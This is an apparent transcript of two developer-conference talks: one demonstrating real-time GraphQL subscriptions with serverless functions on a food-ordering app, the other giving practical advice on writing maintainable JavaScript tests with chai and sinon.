The amazing thing about GraphQL is subscriptions. We talked about all these things happening on the back end — the order being validated — and you need some way of sending that back to the client; that's where we left off. You need a way of consuming async information from the back end without worrying about too much. You may know that some REST-style APIs have a watch method — how many of you have seen or used one? Squinting at the Kubernetes users out there: Kubernetes has this watch method — it's not a standard spec, I guess, but they've implemented it — which lets you watch a resource; it holds a connection open and sends you updates over it. GraphQL subscriptions are exactly like that: the server can send information to the client, not just when the client asks for it — that's how REST works, the client asks and you respond — but whenever something changes. The client opens a subscription, which is essentially a web socket connection, and the server sends data from the back end to the front end over it. For example, in our food-ordering app, the order table has two fields, is_paid and is_dispatched; over time both become true, and you want to show that on the UI as and when it happens. What would you do — all the front-end developers, assuming you know nothing about GraphQL? Polling: the first solution is polling, right? You keep polling the back-end REST API at an interval. Somebody said sockets — sockets aren't something the front-end developer alone can do, whereas polling is. Pardon? Real-time DB, yeah — can you name one? Firebase. Anything else? CouchDB, RethinkDB — there are a lot of real-time databases out there. How many of you actually use them? Firebase, I agree, many might be using — but the others? And Firebase is a NoSQL database; we need to take that into consideration. The second solution is web sockets. There has to be a contract between the front end and the back end — both parties have to agree on how data is sent across — and the same problems as REST APIs come up: what if you want one more field in the web socket response? You ping the back-end developer again. So: polling, web sockets, custom APIs. But those who have implemented web sockets will know the community is really fragmented — Socket.io and the rest exist, but have you tried making a JavaScript client talk to a server in a different stack, or the other way around? Integrating different frameworks and tooling is very difficult, because there's no set standard for how information should be passed over web sockets; it's up to the developers to decide — or, most of the time, one party decides and the other just has to go along. With GraphQL this comes down to a very simple mechanism: the spec is standardized. It's all set down in one GitHub repo — this is how the client talks to the server, this is how the server sends information to the client — and all clients implement the spec, so all clients are compatible with all servers. If the server says "I'm GraphQL compliant" and the client says "I'm GraphQL compliant," it works. Most of the work has already been done by the open-source frameworks and libraries; you just have to use them. So the thing I showed you earlier boils down to this: instead of query, you say subscription. That's all. Your React library — in React it's Apollo; most people use Apollo — gets the update from the back end and refreshes the component automatically. Whenever any of these things happen on the back end, you get the update on the front end.
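The subscription wiring, sketched under assumptions: the react-apollo Subscription component of that era, and Hasura-style field names guessed from the demo's description:

```jsx
import React from 'react';
import gql from 'graphql-tag';
import { Subscription } from 'react-apollo';

// Same shape as a query; only the keyword changes. The server pushes a
// fresh result over the underlying web socket whenever the row changes.
const ORDER_STATUS = gql`
  subscription OrderStatus($orderId: Int!) {
    order(where: { id: { _eq: $orderId } }) {
      is_paid
      is_dispatched
    }
  }
`;

const OrderStatus = ({ orderId }) => (
  <Subscription subscription={ORDER_STATUS} variables={{ orderId }}>
    {({ data, loading }) =>
      loading ? 'Waiting for updates…' : JSON.stringify(data.order[0])
    }
  </Subscription>
);
```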
Now, of course, you need a GraphQL server with subscriptions. So we took our simpler architecture and made it this complicated, and we need all these new pieces. Going back for a comparison: this was the traditional architecture — not scalable, because it was synchronous. This is my asynchronous, scalable architecture. And this is my GraphQL-and-serverless architecture: you have an application, a GraphQL server sitting here talking to the database, the GraphQL client talking to the server over GraphQL, and the server triggering serverless functions based on actions happening on the database, which in turn update the database, and so on back and forth. So — some fun. A lot of theory; now some practical stuff. Cool, and I hope this works — I heard there's conference Wi-Fi; I'm connected to it, so let's see. Why don't you scan this QR code? You'll be taken to a page with an order app and an analytics app. Preferably go to the order app; we'll come to the other one. This is an example application built to demonstrate this scenario. I'll place an order too — though someone is already messing with it. Okay, I'll keep this on one side and the other stuff on the other side. So, guys: when I place a new order, I can see its status in real time. Whoever is placing these thousands of orders, please make sure you pay for them, okay? Otherwise they'll just be stuck there and nothing will happen. This is the number of orders being placed, and the bottom graph is the number of orders being validated; then the payment happens, then the validation and the restaurant approval, and so on. Now, while this is going on — please stop ordering and listen — I'd like to show you what's happening here. This is the code: a React application where you place the order. There's this placeOrder.js file where you do this thing called a mutation, which inserts an order item — when you choose an item, it's inserted into the database. All I did was write this query, and the onClick function is bound to it. This is how the items are loaded: you write a query, and you render each item name with a checkbox. Compare that to a REST API: you'd use fetch, call an endpoint, get the response, put it into state, and then render the component. Here you have a Query component available and it just works right away. And this is how you place the order: the mutation is placeOrder, and the order is placed right away. Whenever you want to see the status of the order, you have a subscription — this is the live status; your order keeps getting updated; these are the fields I want to show, and they're mapped to the component right away. Here you can see the payment status: the Subscription component is used, and based on it I render this template, and the status is rendered here. Now, when you place that order — wow, nice — please pay for these orders, otherwise they won't move forward. Okay, I'm being generous: I'll pay for all of you. And who is "L-E-L-L-O-O-O"? I want to see this person — the one messing with my demo, please reveal yourself. No? Okay, we will find you.
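The client code from this walkthrough looks roughly like the following — a sketch assuming react-apollo's Mutation component and a Hasura-style insert mutation; the table and column names only mirror the demo's description and are guesses at its schema:

```jsx
import React from 'react';
import gql from 'graphql-tag';
import { Mutation } from 'react-apollo';

// Hasura-style insert; placing an order is one mutation, no REST glue.
const PLACE_ORDER = gql`
  mutation PlaceOrder($items: [order_item_insert_input!]!) {
    insert_order(objects: [{ order_items: { data: $items } }]) {
      returning {
        id
      }
    }
  }
`;

const PlaceOrderButton = ({ items }) => (
  <Mutation mutation={PLACE_ORDER}>
    {(placeOrder) => (
      <button onClick={() => placeOrder({ variables: { items } })}>
        Place order
      </button>
    )}
  </Mutation>
);
```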
So — the server. When you place a new order, this serverless function gets triggered. It's hosted on Google Cloud, where you can see validate-order and its number of invocations over the last hour — it's going pretty high right now. Whenever you do any action here, the corresponding serverless function is triggered, and you can see it climbing slowly. That's partly because Google's invocations per second are quite low — something like 16 requests per second — so it catches up as it gets time. Now let's try to pay for all these orders — oh my god, this person. I'm going to pay for all the orders: I'm going to update the order table and set is_paid to true where is_validated is true. Those familiar with GraphQL will recognize what this is. Once that's done, it tells me how many rows were updated. I execute the query — 18,200 orders have been paid for. You can see this massive jump here: the green jump is due to the orders that have just been paid.
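"Pay for everything validated" is a single bulk update — sketched below in Hasura's update-mutation convention (where / _set / affected_rows); the exact table and column names are assumptions based on the demo:

```js
import gql from 'graphql-tag';

// One statement pays every validated order and reports how many rows
// moved — the query behind the "18,200 orders have been paid for" moment.
const PAY_VALIDATED_ORDERS = gql`
  mutation PayValidatedOrders {
    update_order(
      where: { is_validated: { _eq: true } }
      _set: { is_paid: true }
    ) {
      affected_rows
    }
  }
`;
```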
The validate-order function is still very slow to get invoked, so I may have to resort to my videos — thanks to our aforementioned friend placing infinite orders. We saw how to place one order; when you make many orders, this is what the ideal situation looks like. And this is what happens when you have a system and you didn't design for the kind of scale you expect: even if you call it scalable, resilient, whatever, you need to anticipate that scale. Last time I did this demo I got around 40,000 orders and I was under the same impression — but yeah, you guys are really awesome. Not all of you — that one person. I will find that one person; whoever you are, come to me after the talk, I have some gifts for you. Good gifts. So in the ideal scenario, validation keeps going — I only configured this to handle a certain amount of scale — the validations go on, and when all the orders are pending payment and you pay all orders, the payment graph suddenly jumps; the next step, restaurant approval, keeps happening; and once that reaches a particular state, the next function, delivery assignment, keeps triggering. Now imagine building an application that handles 50,000 orders. If you had to build for this scale yourself, I don't even know how much work that is — and this is just front-end hacking: a couple of React lines and one database model. That's it. Done. Next, let's see what happens when your network breaks down. I can't really show you that on the Google Cloud side, because there's no way of turning off the function. So I make some orders — I've paid for about a thousand, the validation is happening, payment has happened — and this is my restaurant-approval function, on AWS Lambda, which has a throttle button. Hit throttle, and the function just stops executing — you cannot invoke it anymore. So this many approvals have been done, this many delivery-agent assignments have been done, and by this time the function has been throttled; after that the graph just flattens — nothing happens, because the function can't be triggered anymore. Everything is stuck at restaurant approval. Once I let the function run again — I've allocated 1,000 concurrency to it — it starts running, and everything continues as expected. So there was, effectively, a network failure in between: everything stopped executing, and it picked up again when the network was back. That is how resiliency is achieved. And you can see all the invocation logs: in the events tab, for the validate-order function, you can see each event — this event was delivered, this was the request, this was the response — and what the order status is. Are we still getting spammed with orders? Looks like it stopped. Keep a watch on the analytics-app link after the talk as well; you'll see how the system handles the scale without any intervention. I haven't tweaked anything for this particular load — this was configured for 1,000-2,000 orders — so see for yourself how it copes. It's nice to see all this in one talk, but we've also — formally or not so formally — put it down in one place. Go to 3factor.app and you can read about these architecture principles I've just introduced: real-time GraphQL for faster iteration, reliable eventing for resiliency, and async serverless for scalability. So check out 3factor.app and learn more about this architecture. That's it from me. The product I used just now is the Hasura GraphQL engine — that's what we do: we build GraphQL on Postgres. Check out the GitHub repo and star it; it's open source. We released it three months ago and the response has been huge — it would be awesome if all of you starred it and showed us more love. You know the stars you got in school, the ones they'd stick on your notebook — "very good, star"? Not saying it's the same thing, but that's how it feels. Anyway, please meet me after the talk. Any questions?

Do we have time for questions? Let's take a couple — and we'll definitely star your repo. Please show the same enthusiasm you showed in placing those orders; if you do, we could get some 200-300 more stars.

Hi — you've talked about the benefits of GraphQL and how it handles so many orders. What about the drawbacks of using it? What are the disadvantages?

So, at every step where I pointed out a benefit, I also pointed out the cost — it's not technically a drawback; it's a cost. You need a GraphQL server with subscriptions, and building one is not easy; it doesn't come for free — unless it's the GraphQL engine, which is open source and free. If you want to do this on your own, it's a mammoth task. And if you particularly want the cons: they're the ones that come with any real-time asynchronous system. You need to handle race conditions and edge cases that would never appear in a synchronous system — the moment you introduce asynchronous actions or patterns into your architecture, you have to handle all the other problems they introduce. Does that make sense? With GraphQL per se, I can't pick out much — there are issues with
the client libraries — any new system has its own issues — but it's getting better, because the community is working towards making it better. Any other questions?

I had a question. From what I've seen, where you use GraphQL, the query typically gets sent to the server over HTTP POST, which makes any kind of CDN or HTTP-based caching completely useless. Have you figured out a way — are there any patterns — to get the best of both worlds: the power of GraphQL without losing all forms of HTTP caching?

This, you could say, is one of the cons. Certain things you can cache on your server. One way people have tackled it is to send the query in a GET request, as a query parameter — which is a hack, but people have done it. The community is working towards better caching mechanisms; typically you won't need to worry about it until you're at scale, but it's a problem being actively worked on, with no complete solution right now.

That's a great talk, Shahid — thanks for listening, everybody. And to that "hello" person: that's a good applause. If anyone is still interested in learning or discussing more about GraphQL, there's a BOF at 4:40 outside, and he'll be present, so you can ask all the questions you have. We'll take a coffee break, whatever you like — we'll meet back at 4:30.

So let's start the session. Our next — sorry — our next speaker is an entrepreneur: two startups right out of college. He's also called "Guruji" in his office — everyone takes advice from him. He loves cats and dogs; he has three cats, one is Sushi, and I don't know the other two names. He also loves manga and anime. He's going to talk about the art of writing tests, for the back end and beyond. Let's listen to him. Thank you.

Hey everyone, thank you so much for coming out today and staying till the very end. My name is Deepak Pathania, I work as a product engineer at Postman — the API development environment you all know and love — and today I'm going to talk about the art of writing mature tests. I'm available on Twitter as Deepak Pathania, which was supposed to be a clever wordplay on my name, but now that I say it out loud in front of so many people, it doesn't sound as clever. But I'm there on Twitter, so you can talk to me about APIs, tech, or life in general — I'm pretty chill like that. Let's get started.

A little about why I decided to compile this talk in the first place. During my initial months at Postman, I was working on a module that was supposed to be really, really performant. We kept trying different implementations to extract that last juice of performance out of it, and we were trying genuinely good strategies — but there was one problem: tests were holding us back. Every time we tried a new strategy, I was writing and rewriting a lot of tests, modifying them all because of a slight change in the codebase — the tests couldn't accommodate the change; they were too rigid about the internal implementation. At one point I was spending more time fixing tests than writing actual code, which I took as a huge red flag. I was going through tons of fixtures to debug failing tests, and I thought something had to be done. Then things got a little worse: I realized I was mocking and stubbing and faking and spying and — you get the idea,
right? My tests were using everything available for writing tests out there; they had become just as complex as the code I was writing. And I was hoping the flaky tests wouldn't show up in the pipelines again, because some of them I couldn't reproduce on my local system, so I had no idea how to proceed. At one point I was just staring at assertion failures and stack traces aimlessly. So we decided there had to be a better way. We tried a lot of different testing strategies, and some of them started to make a lot of sense. As a benchmark: we went from fixing about a hundred tests for a minor version release to fixing fewer than ten for a major version release. So we figured these things actually work, and decided to compile all the small things you can do without drastically changing your existing suite.

Since my title is so click-baity, let me explain what not to expect from this talk. It's not a comparison of the different testing libraries, frameworks, and approaches out there — I'll assume you're happy with what you have, and if you're not, there are tons of great libraries, resources, and articles online that outline those differences much better than I can in a 30-minute talk. It's also not me preaching about writing testable JavaScript from the beginning — I won't tell you your tests are bad because your code is bad, because I can't preach about something I don't practice myself. So what should you expect? Some small actions to improve your current tests without making drastic changes to your current frameworks.

So: some common mistakes, and how to avoid them. I've structured this as a 12-point talk about the before and after of common testing scenarios you might come across. One thing to note: none of the "before" versions I show are bad, exactly — they work, and they work very well. It's just that as you scale, some of them might not scale with you. I've also tried to stay framework-generic, but for the demonstrations I'm using chai and its expect interface — you can apply these suggestions in any testing framework; I picked chai because I love the beverage.

Before the first point, there's a 0th point: the test monolith. The term monolith has been thrown around a lot today, so I just wanted to ride the wagon. The test monolith is code with high coupling and no isolation: the tests are coupled in a way that you can't isolate them and run them independently. They're neither unit nor integration tests — they make DB calls, call third-party services, assert on multiple values — and they don't fall into either category because they give you the worst of both worlds: you don't get the isolation and speed of a unit test, and you don't get the coverage and confidence of an integration test either. I mention this as the 0th point because it's what we're trying to avoid throughout: all 12 points build up to it, so that if you follow them, hopefully you can avoid the
test monolith. Okay, let's get started.

First: asserting on deep equality. Let's walk through this code and see what's wrong with it. This is a normal test for user-details verification: the user returned from a DB call should include all the required keys — a valid thing to test. We have a user ID — never mind how the user was created — and we call the DB service to get the user; once we have them, we assert that the result is exactly an object with id "id1" and name "deepak". This might seem like a perfectly valid test, and it is, but there's a small problem: whenever you deal with deep equality and strict checks, there's a very high chance you'll be fixing the test later. Those of us at startups work on things under rapid development: you'll be adding keys and removing values from the response objects you pass between functions, and if your test is strict about the exact object, it's bound to break. Tomorrow you add a username field to your users, and every test that checks the user response strictly like this starts breaking, because the assertion says the response must be exactly this. A slightly better way: the exact same test, but after getting the user from dbService.getUserById, rather than asserting on the exact structure, we just assert that it includes all the required keys. I promised not to go deep into one framework — this exists in most BDD assertion syntaxes; I've shown the chai version, and you'll find something like include or contain in your framework of choice. This one simple fix — checking for required keys instead of the exact deep object — makes a huge difference once you're iterating rapidly.

Next: skipping tests. We've all skipped tests, and sometimes it's genuinely required. Here, for example, I have a listing-ordering test — it should allow moving a listing to the beginning; I'm assuming it's a linked list of listings — and it's perfectly valid, but for now we've skipped it. What's wrong? Something probably isn't ready for this test to run — but we haven't specified what that thing is, or when the test should be unskipped. I've seen open-source codebases with a skipped test from two years ago that no later developer had the heart to touch, because nobody knew what it did. A small but nifty solution: say that moving a listing to the beginning is currently not supported because of a specific limitation, and add a to-do — "unskip this once the head pointer is introduced." The next person who reads this and sees the head pointer has landed can unskip it and get on with it. It's a small change, but skipped tests accumulate: I've seen 15-20 of them that nobody dared touch because nobody knew what they were supposed to do. A small thing that goes a long way when you work in teams.
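A sketch of both fixes, using mocha and chai as in the talk — dbService and the listing test come from the speaker's examples, so their exact APIs here are assumptions:

```js
const { expect } = require('chai');

it('should return the user with all required keys', async () => {
  const user = await dbService.getUserById('id1'); // assumed service API
  // Loose on extras, strict on what matters: adding a `username` field
  // to the response later won't break this assertion.
  expect(user).to.include.all.keys('id', 'name');
});

// A skipped test that explains itself and says when to unskip it.
it.skip('should allow moving a listing to the beginning', () => {
  // Currently unsupported: the list has no head pointer yet.
  // TODO: unskip once the head pointer is introduced.
});
```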
Next slide: too many fixtures. Fixtures are the dummy data you feed your tests and assert against — we've all seen that large JSON fixture object. Here we have too many of them: one user whose role is admin, a second whose role is user, and many more users with slightly different properties used across different tests — the first in a test for admin privileges, the second for non-admin privileges, and so on. The problem is that when something breaks, the next person has to go three levels deep to debug it. Imagine: a test that uses fixtureData.u1 suddenly starts breaking. They open the fixture file, look at u1, look at its properties, go back to the test to see which property might be breaking it, and only then start debugging. If you have two thousand of these objects for different scenarios, that's technical debt you need to pay off. A better way is to construct an object with the minimum required properties. Here I'm checking admin privileges — that an admin has access to remove members — so I construct a bare-minimum object that gets the job done. The only difference between the first two users, apart from names and avatars, was their role; so I build just that object, pass it to the function, and check the same things, instead of reaching into a fixture file. Since it's specified in the test itself, it's easy for the next person to debug. And note that I said minimum required properties: some of you may have policies that require a user object to have certain keys, so knowing the minimum set with which you can construct test objects is a nice thing to have.
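A sketch of the minimal-fixture idea — `makeUser` and `canRemoveMembers` are hypothetical stand-ins for the talk's example:

```js
const { expect } = require('chai');

// Build only what the test exercises, with sensible defaults for the rest,
// instead of reaching three levels deep into a shared fixture file.
const makeUser = (overrides = {}) => ({
  id: 'u1',
  name: 'test-user',
  role: 'user',
  ...overrides,
});

it('should allow an admin to remove members', async () => {
  const admin = makeUser({ role: 'admin' }); // the one property under test
  expect(await canRemoveMembers(admin)).to.equal(true);
});
```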
Moving on: conditional logic. This one is a little bigger; let's read through it. The test checks that on violating thresholds, the user is added to a mailing list — if a user violates some usage threshold, we add them to a mailing list to say "hey, upgrade your plan," or something. We have the user's current usage, which we get from a random number, and depending on that number the usage may be above or below the threshold. If it's below, we assert that the mailing list does not have this user; if it's above or equal, we assert that it does. It's a valid thing to verify — but the problem, as the name of the point says, is the conditional logic. A test should ideally exercise exactly one execution path; if it checks multiple paths, break it into two tests, each forcing one path. The better way: we define a value above the threshold — say a thousand — use it as the current usage, and simply assert that the mailing list has the user. The next test uses a value below the threshold and checks the alternate path. Simple, but it guarantees each test goes through one known execution path — no uncertainty involved.
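A sketch of the single-execution-path fix — `recordUsage` and `mailingList` are hypothetical names for the mailing-list example:

```js
const { expect } = require('chai');

const THRESHOLD = 1000;

it('should add the user to the mailing list when usage is above threshold', async () => {
  const user = { id: 'u1' };
  await recordUsage(user, THRESHOLD + 1); // fixed value: always the "above" path
  expect(mailingList.has(user.id)).to.equal(true);
});

it('should not add the user when usage is below threshold', async () => {
  const user = { id: 'u2' };
  await recordUsage(user, THRESHOLD - 1); // the alternate path gets its own test
  expect(mailingList.has(user.id)).to.equal(false);
});
```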
Next: following poor spec-naming conventions. Naming variables is famously one of the hard problems in tech, and the same goes for naming your test specs. What I've seen most people do is use the function name in the describe block: if I'm writing a function that adds a user, my describe block says "addUser". But as a rule of thumb, the describe and it blocks together should read as a proper sentence — the next person might not have your context, and if reading the spec makes perfect sense to them, their job gets much easier. A single test description should include the unit of work, the scenario, and the expected outcome. Let's look at some examples where this is followed and violated. Here we use the function name as the describe description, and the it block says it's a test for number 7233. Now, 7233 could be a GitHub issue, a Jira ID — God knows what. If this test fails tomorrow, the person looking at the code has to figure out what 7233 means, find that issue, see what went wrong there, come back to the test, work out what changed since then — and by that time you've lost a thousand users. And an issue ID doesn't age well anyway: what if you used Jira earlier and then transitioned to something like Aha or another issue tracker — how do you know which tracker the ID belongs to? Another example, taken from a very famous open-source library: again the function name as the describe text, plus "should return 200 for proper input" and "should return 400 for wrong input". Both tests pass; in the first one somebody used a value of, say, 5, and in the second a value of, I don't know, 8. As the next person, it's left to my imagination what those numbers mean — does this function only work for odd numbers, or only for multiples of 5? Since nobody specified what "proper input" or "wrong input" is, I have no context; it leaves everything to the imagination of the next person. There's a famous quote: always write your code as if the person who ends up maintaining it is a serial killer who knows where you live. Follow that principle, and this is not what your test specs should look like. Here's a better spec: dispatching an active bucket should empty the active bucket and add it to the processed list. It follows everything we've discussed — unit of work, scenario, expected outcome. Someone who sees it fail immediately knows the dispatching logic of the active bucket is broken and can go fix it. They're a happy person; so are you.

Next: deeper implementation levels. We're testing a function that adds a user to the database — "adding a user should add them to the database"; so much for good naming. We build a user with the bare-minimum properties from earlier, and in the async waterfall we add the user; in the next step we look at an internal queue — users are added to it first, then flushed to the database — and we assert that the internal queue includes our user. Looks perfectly valid: add a user, it goes into the queue, gets flushed to the DB. So much for writing good tests — but there's something wrong: we're at a deeper implementation level than the one we claimed to test. What does that mean? Here's the better way: we do the same thing, add the user, but we stay at the right level by verifying in the DB — rather than checking the internal queue, we fetch all the users and check that the one we just added is among them. Why does that matter? Consider the internal queue's flushing logic breaking: users you add never reach the database, yet all your tests still pass, because you only asserted that the user entered the queue. It's a simple, naive example, but the point stands: stay at the level of the thing you claim to verify. If you're saying an action went through, don't just check that the endpoint returned 200 — verify that the action is reflected in the DB; then a discrepancy between your database and your returned JSON can't fool you. Is it making sense? Okay, nice: we expect that the users include this particular user.
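A sketch of that same-level verification — dbService's addUser/getUsers are assumed method names extrapolated from the example:

```js
const { expect } = require('chai');

it('adding a user should add them to the database', async () => {
  const user = { id: 'u42', name: 'ada' }; // bare-minimum properties
  await dbService.addUser(user);

  // Verify at the same level as the claim: read back from the DB itself,
  // not from the internal queue that flushes into it. If the flush logic
  // breaks, this test catches it; a queue assertion would not.
  const users = await dbService.getUsers();
  expect(users).to.deep.include(user);
});
```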
Uncertainties. We have a test for string handling: it should ensure large strings are handled properly. It's one of those functions that formats large like-counts — say, 10 million likes into "10M" — and the way it behaves is that if it gets a string it can't handle, it throws an error; that's the assumption. Here's how we test it: we build a very large string in a loop using an iterations variable — a huge string x that's just "12345" repeated — pass it to formatLikes, and see whether it throws. If it does, we return the done callback with the error; otherwise we call done. So: if your formatLikes function throws, the test fails. Some of you might wonder why there are no assertions here — that's because of how we handled the error in the catch block: returning the done callback with the error fails the test. Now, here's the problem: if this test fails, there's an uncertainty in my mind. Did formatLikes go wrong, or did my string-generation logic go wrong? Maybe the method I used to generate large strings went wacky and stopped producing what I expect. Which one broke? I have to investigate to know — and that's exactly what you don't want to be doing while things are breaking. A better way is to specify a static string, so you trust your tests: you know you passed a fixed value, so if the test fails, something is wrong with formatLikes for sure. The last thing you want when production is failing is to wonder whether your tests are wrong or your code is; you want certainty about what to target, and a hard-coded string gives you that.
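The certainty fix as a sketch — formatLikes is the talk's example function; the fixed input replaces the random generator:

```js
const { expect } = require('chai');

// Deterministic input: if this test fails, formatLikes is at fault —
// there is no string-generation logic left to suspect.
const LARGE_STRING = '12345'.repeat(100000);

it('should throw when given a string it cannot handle', () => {
  expect(() => formatLikes(LARGE_STRING)).to.throw();
});
```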
Separating declarations from usage. This isn't really about how tests work — it's something you hit when debugging failing tests, and it used to get on my nerves, so I included it. I have two variables at the top — bonus points to anyone who knows what the names mean; come talk to me. In this describe block, all the vars are declared up top: the first inner block uses neither Luffy nor Zoro, the second uses Zoro but not Luffy, and the third uses both — yet everything is declared at the top so it's available across the describe blocks. The next person who joins your organization sees this and takes it as the house practice: declare every test variable up top. It snowballs — I've seen test files that open with 150 lines of variable declarations before the first describe block even starts. The last thing you want when debugging a failing test is to scroll all the way up, find the variable, and scroll back down; I've tried split view and all of that, but when things are failing you just want peace of mind. The good way is to use the scope that describe blocks give you: declare variables closest to their usage. Since each describe block has a scope of its own, a variable used only in one block should be declared at the top of that block — it makes much more sense to scope things to the block they're used in than to the top of the file.

Moving on: dependence. We have a describe block that tests all the scenarios of updating a user's status. In the first test — it should allow updating the role of the user — we create a user, pass the user's ID along, and verify in the DB that the update went through, like good testers. But we did something wrong: in the second test we update the user and verify it in the DB, reusing the same user created in the first test, hoping that since they're in the same describe block they'll always execute in order — the first test creates the user, and later tests reuse them. That is dependence between tests. Ideally, every test should be able to run in isolation: when you're fixing one test, something like an .only clause should work on each and every test. Setups and teardowns are there for your rescue. Here's the same thing done better: the "updating user status" block has a before hook that runs ahead of the tests in this particular describe block — hooks run first, then the tests. Notice I'm using it.only here, and it works, because the user creation happened in the before hook: even run in isolation, the test has access to the user it's updating — unlike the first case, where the user was created inside the first test and reused by the next.
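The before-hook version as a sketch, with assumed dbService method names — the point being that `.only` keeps working because the hook runs regardless:

```js
const { expect } = require('chai');

describe('updating user status', () => {
  let userId;

  // Runs before the tests in this block, so every `it` below can run in
  // isolation — even with `.only` — without leaning on a sibling test.
  before(async () => {
    const user = await dbService.createUser({ name: 'test-user' });
    userId = user.id;
  });

  it.only('should allow updating the role of the user', async () => {
    await dbService.updateUser(userId, { role: 'admin' });
    const updated = await dbService.getUserById(userId);
    expect(updated.role).to.equal('admin');
  });
});
```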
That brings us to the next point: extra setup. We just saw how setups and teardowns remove dependence, but used the wrong way they'll hold you up and choke your pipelines. Look at this test of user-updating flows: for admin privileges we create an admin and a non-admin user, and in the after hook we delete the created users. Notice we're using beforeEach instead of before — it runs before every test, so even though we create and delete users, each test still has access to them. The first test uses the created admin user; the second uses the created non-admin user. Seems perfectly valid — except we're creating both the admin and the non-admin user before each test runs. The flow is: create two users, use one in the first test, delete both; create two users again, use one in the second test, delete both. That's just two tests — imagine 5,000. If your setups and teardowns run a lot of code that isn't actually needed by every test in the block, you're paying that cost for every single test, and as you scale, your pipelines run for 30-40 minutes. Your developers push something, go out, eat, come back, see the pipeline has failed, rerun it, and do that for the rest of the day — not what you want. The better way: scope the different checks into two separate describe blocks. Since describe blocks follow scoping, each block runs only its own lifecycle hooks — the admin setup and all admin-related tests in one block, the non-admin setup and tests in the other. The test verifying that an admin can update the team billing cycle gets only the admin user created before it runs. Group together only the tests that share common prerequisites.

Moving on: asserting on values without explanations. We have something called a spy here — a spy is a construct that watches a function and records everything that happens to it: how many times it was called, what arguments were passed each time, and so on; you can read more about spies — I'm using sinon here. I have a spy on db.update and a spy on db.destroy; I create an admin user, delete the user, and then assert that the spy on db.destroy has a call count of one and the spy on db.update a call count of two. The test works, everyone is happy — until one fine day it breaks, and the assertion message is simply that the spy on db.update has a call count of one rather than two. The next person, who has no idea what goes on inside db.update during an admin deletion, has no clue what's wrong. In the worst case they change the expected count from two to one, watch the test pass, and push — hoping it was simply wrong earlier and now it's fixed. Asserting on bare numbers without explanation easily confuses people: when it fails, you get a message like "expected 4 to equal 3," which tells the next person nothing. A small change goes a long way: same test — create the admin user, delete the user — but we state what each call means. db.destroy should be called once, for the user being deleted. db.update should be called twice — once for the team members being updated, and, since this was the admin user, once because the ownership had to be transferred to someone new. Now a failure tells the reader that either the team-member update or the ownership transfer broke, and they have a clear line of attack instead of speculation.
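A sketch of spy assertions that explain themselves, using sinon plus chai's optional assertion message — db, deleteUser, and adminUser are stand-ins for the talk's example:

```js
const sinon = require('sinon');
const { expect } = require('chai');

it('deleting an admin should destroy the user and update the team', async () => {
  const destroySpy = sinon.spy(db, 'destroy');
  const updateSpy = sinon.spy(db, 'update');

  await deleteUser(adminUser);

  // A failure now reads as a diagnosis, not as "expected 2 to equal 1".
  expect(destroySpy.callCount).to.equal(
    1,
    'db.destroy: once, for the user being deleted'
  );
  expect(updateSpy.callCount).to.equal(
    2,
    'db.update: once for the team members, once to transfer ownership'
  );

  destroySpy.restore();
  updateSpy.restore();
});
```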
Okay, last point: too many assertions. Let's see what this huge test does. It verifies that a user with the role admin can delete the team: we create a user and assert on the returned response, like good testers; we verify in the DB that the creation went through; we update the user to grant delete access and verify in the DB that the access was granted; we delete the team the user belongs to; and we verify in the DB that the team was deleted. Looks like a great test — but at every step we pile on assertions: create, verify; update permissions, verify; and only then do we actually do what we set out to test. A good way around this is stubs. A stub is a function with pre-programmed behavior: you specify what it should always do, and when a stub wraps a function, the original is never called — the replacement you specify runs instead. Here I have separate tests for user creation and user updating — which is very important: I'm sure users are created and updated properly, because I have dedicated tests for those, they work, and I'm confident about my tests. So in this particular test I simply stub that the user is created and has the required access: whenever dbService.getUser is called, rather than calling the actual function, just return this user with all the granted access. Then I get the user, delete the team, and — like a good person — verify in the DB that it was deleted. The point is that you should have some abstraction in your tests: if a test is doing multiple things, abstract some of them away and stub your way to the particular point you care about.

Which brings me to the next thing: abstraction in tests. Consider a flow: an initial state, some setup, a branching state, and then transitions down different paths A, B, and C. Ideally, there should be a separate test asserting a user can reach the initial state properly; a test that stubs the user reaching the initial state and checks the setup state is reached properly; another that stubs the setup and checks the branching state can be reached; and another that starts from the branching state and tests each individual path. The point I'm trying to make: if you're testing a thing, make sure you test it only once. If you have a test for user creation, no subsequent test that needs a created user should be doing that again and again — if you have to reach a particular branching state to test multiple paths, use stubs to assume you've already reached it, and actually test only the thing required on that particular path.
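A sketch of stubbing your way past already-tested steps — sinon.stub replaces dbService.getUser with a pre-programmed user; deleteTeam and getTeam are hypothetical:

```js
const sinon = require('sinon');
const { expect } = require('chai');

it('should allow a user with role admin to delete the team', async () => {
  // User creation and permission granting have their own dedicated tests,
  // so stub straight to the state this test actually cares about.
  const getUser = sinon.stub(dbService, 'getUser').resolves({
    id: 'u1',
    teamId: 't1',
    role: 'admin',
    canDeleteTeam: true, // pre-programmed: the setup steps are assumed done
  });

  const admin = await dbService.getUser('u1');
  await deleteTeam(admin);

  // Only the behavior under test gets asserted, at the DB level.
  expect(await dbService.getTeam(admin.teamId)).to.equal(null);
  getUser.restore();
});
```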
Which brings me to the next thing: abstraction in tests. Consider a scenario where we have an initial state, some setup, a branching state, and then transitions to different paths a, b, and c. Ideally there should be a separate test asserting that a user can reach the initial state properly; a test that stubs the user into the initial state and checks that the setup state is reached properly; another that stubs the setup state and checks that the branching state is reached properly; and then tests that start from the branching state and exercise each individual path. The point I'm trying to make is: if you're testing a thing, make sure you test it only once. If you have a test for user creation, then every subsequent test that requires a user to exist should not be creating one again and again. If you have to reach a particular branching state to exercise multiple paths, use stubs to get there, and then test only the thing that particular path is about.

Which brings me to test design. Test design is nothing fancy. I'm not going to talk about TDD, because it does not really make sense for some startups where you are rapidly changing things: you write tests for something, you make them fail, you make them pass, you write the code, and tomorrow some other requirement comes along and the entire code base goes away. So TDD does not make a lot of sense in some of those cases. Instead, something as simple as test design makes a lot of sense: you lay down constraints to define the boundary, identify the different actors, scenarios, and permutations from the beginning, write them down as describe blocks, and only later write the tests that fill those blocks in. This lets you think first and test later: you have already prepared a spec of what your tests should look like, and when your code is ready you simply fill in those specs.
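As a minimal sketch of that spec-first approach (Mocha-style, with hypothetical feature names): an it() without a callback is reported as pending until you fill it in.

```js
// Think first: lay out actors and scenarios as empty describe/it blocks.
describe('teamService.deleteTeam', () => {
  describe('when the caller is an admin', () => {
    it('deletes the team');                // pending until implemented
    it('removes all members of the team');
  });
  describe('when the caller is a regular user', () => {
    it('rejects the request');
  });
  describe('when the team does not exist', () => {
    it('fails with a not-found error');
  });
});
```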
